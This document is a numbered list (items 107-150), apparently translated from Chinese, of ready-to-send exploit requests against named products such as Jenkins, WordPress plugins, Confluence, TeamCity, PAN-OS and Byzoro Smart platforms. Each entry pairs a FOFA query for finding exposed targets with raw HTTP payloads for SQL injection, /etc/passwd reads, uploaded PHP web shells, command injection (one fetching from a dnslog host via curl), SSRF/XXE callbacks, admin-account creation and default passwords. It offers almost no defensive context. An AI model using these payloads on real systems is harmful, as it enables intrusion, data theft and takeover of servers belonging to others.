107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Byzoro Smart S210 Management Platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then visit /home/src.php

119. Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Byzoro Smart S40 Management Platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality testing system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

File path: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed from there.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

